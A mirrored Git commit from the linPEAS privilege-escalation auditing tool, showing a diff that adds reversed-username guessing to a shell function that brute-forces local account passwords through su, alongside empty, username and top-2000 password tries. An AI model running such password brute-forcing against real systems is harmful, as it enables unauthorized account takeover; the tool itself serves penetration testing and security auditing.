1
mirror of https://github.com/carlospolop/PEASS-ng synced 2025-02-21 10:30:58 +01:00

linpeas2.2.0

This commit is contained in:
carlospolop 2019-12-02 13:32:14 -05:00
parent a01c6a54ae
commit 2e7bfe9a66

@ -281,6 +281,7 @@ su_brute_user_num (){
TRIES=$2
su_try_pwd $USER "" & #Try without password
su_try_pwd $USER $USER & #Try username as password
su_try_pwd $USER `echo $USER | rev 2>/dev/null` & #Try reverse username as password
for i in `seq $TRIES`; do
su_try_pwd $USER `echo $top2000pwds | cut -d " " -f $i` & #Try TOP TRIES of passwords (by default 2000)
sleep 0.007 # To not overload the system